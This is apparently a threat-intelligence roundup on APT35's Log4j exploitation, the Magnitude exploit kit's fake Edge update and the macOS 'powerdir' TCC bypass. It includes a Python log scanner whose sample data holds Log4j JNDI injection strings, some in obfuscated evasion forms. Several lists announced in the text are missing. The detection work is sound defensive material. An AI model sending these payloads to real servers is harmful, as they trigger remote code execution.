Suspected Threat Actors: APT35 (aka Charming Kitten, TA453, or Phosphorus)
According to researchers, Iranian nation-state actor groups began widespread scanning and attempts to exploit the Log4j flaw on publicly exposed vulnerable systems merely four days after the vulnerability's public disclosure. With hastily assembled infrastructure, the threat actor group used open-source tools for exploitation and reused infrastructure from many of its previous attacks to carry out this operation, which allowed researchers to easily detect and attribute the activity. However, shortly after these attacks started, researchers observed a subgroup of APT35 engaged in a large-scale campaign that employed its own implementation of the exploit. Exploitation attempts were observed against approximately 150 organizations, though it is not clear how many of those were successful. Upon successfully exploiting a system vulnerable to the Log4j vulnerability (CVE-2021-44228), the threat actor group deployed CharmPower, a PowerShell-based modular backdoor.
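Because the scanning described above hit exposed systems within days, defenders mostly see it first in web-server access logs. As an added example (not code from the report or from any of the researchers it cites), the Python below flags log lines carrying a JNDI lookup, and goes slightly beyond the text by collapsing the nested-lookup forms commonly used to evade naive string matching; the log lines, client IPs and the `callback.invalid` hostname are constructed placeholders.

```python
import re
from typing import List, Tuple

# Constructed access-log sample (not taken from the report); the client IPs
# and the callback hostname are placeholders.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Dec/2021:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.11 - - [14/Dec/2021:10:01:05 +0000] "GET /api HTTP/1.1" 200 88 "-" "${jndi:ldap://callback.invalid/a}"
203.0.113.12 - - [14/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}ndi:${lower:l}dap://callback.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.13 - - [14/Dec/2021:10:01:12 +0000] "GET /img.png HTTP/1.1" 200 2048 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://callback.invalid/c}"
"""

# Innermost ${...} lookup: a body with no further '$', '{' or '}' inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way the Log4j interpolator would for
    the evasion forms most often seen in scanning traffic."""
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # "${unknown:-x}" falls back to x
        return body.split(":-", 1)[1]
    return "${" + body + "}"              # other lookups are left untouched

def normalize(value: str, max_rounds: int = 10) -> str:
    """Repeatedly collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(lambda m: _resolve(m.group(1)), value)
        if collapsed == value:
            break
        value = collapsed
    return value

def is_jndi_lookup(value: str) -> bool:
    """True when the normalized value still carries a JNDI lookup."""
    return "${jndi:" in normalize(value).lower()

def scan_log(text: str) -> List[Tuple[int, str]]:
    """Return (line number, client IP) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if line and is_jndi_lookup(line):
            hits.append((number, line.split(" ", 1)[0]))
    return hits
```

Calling `scan_log(SAMPLE_LOG)` on the constructed sample returns hits for lines 2, 3 and 4, each paired with the source IP so it can be fed into blocking or alerting.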
According to researchers, the threat actor group is known in the cybersecurity community for making several OpSec mistakes. Once exposed, the group tends not to put much effort into changing its infrastructure to make attribution harder for defenders. It comes as no surprise that there are significant overlaps in code and infrastructure with previous APT35 activities.
Further, while analyzing the infrastructure used in this attack, researchers made the following observation:
Researchers have recently disclosed that the attackers behind the Magnitude Exploit Kit (EK) have updated it to target Microsoft Edge users with a fake browser update. The EK uses a range of social engineering techniques and exploits to compromise users and install ransomware. While Magnitude EK has targeted multiple geographies and delivered different kinds of ransomware in the past, it currently appears to target South Korean users with Magniber ransomware. A typical attack chain involves the following steps:
Historically, fake software updates have proven to be a prominent tactic employed by attackers in their campaigns to trick users into downloading malware. These tactics often involve impersonating a popular and well-known brand. The attackers, who are also skilled social engineers, tune the messages with the right mixture of implied threat and urgency.
For years, fake Flash updates have been used by attackers to carry out web-based malware campaigns. Their popularity among attackers can be attributed to the fact that Flash was widely used, famously riddled with security flaws, and updated almost monthly. With the retirement of Flash, attackers had to look for other options. As such, the web browser is an ideal candidate for attackers, since it maintains a frenetic update schedule and is widely used.
In the past, Magnitude extensively targeted Flash and Internet Explorer vulnerabilities. However, changes in the software landscape force attackers to adapt; one example is the exploitation of a sandbox escape vulnerability in Chromium-based browsers in late 2021.
The attackers behind Magnitude regularly update the EK with fresh attacks. Researchers highlight that the fake Edge browser update appears to have been added in the last few weeks.
Microsoft has recently disclosed details of a new macOS vulnerability dubbed “powerdir” and identified as CVE-2021-30970. The vulnerability could allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology, resulting in unauthorized access to a user’s protected data. Introduced in 2012 in macOS Mountain Lion, TCC essentially helps users configure the privacy settings of their apps. To protect TCC, Apple implemented controls that prevent unauthorized code execution and enforced a policy restricting access to TCC to only apps with full disk access. Microsoft uncovered that it is possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests.
If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data. For example, the attacker could hijack an app installed on the device—or install their own malicious app—and access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen.
The following previously reported vulnerabilities allowed bypassing the TCC technology:
An exploit similar to Microsoft’s “first POC exploit”, which plants a fake TCC database file and changes the user’s home directory using the Directory Services command-line utility, was presented at Black Hat USA 2021 in August. However, after the Monterey release, Microsoft used a “second POC exploit” to demonstrate the vulnerability.